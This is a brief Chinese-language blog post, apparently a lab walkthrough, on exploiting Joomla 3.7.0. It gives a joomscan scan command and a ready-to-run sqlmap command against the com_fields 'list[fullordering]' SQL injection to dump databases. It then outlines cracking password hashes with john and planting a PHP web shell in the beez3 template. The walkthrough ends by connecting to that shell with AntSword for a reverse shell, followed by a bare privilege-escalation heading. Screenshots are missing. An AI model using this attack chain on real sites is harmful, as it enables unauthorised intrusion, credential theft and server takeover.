Joomla漏洞利用

漏洞扫描

joomscan -u http://192.168.1.24/

Joomla3.7.0有一个sql注入漏洞

//--dbs 可变参数部分,通过更改这个参数来获取数据库,表,用户密码
sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Join hash文件

john 文件

登陆Joomla管理控制台以后的利用

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

http://192.168.1.24/templates/beez3/html/yjh.php就是文件地址

蚁剑链接,反弹shell

提权

猜你喜欢

转载自blog.csdn.net/qq_44635376/article/details/113521873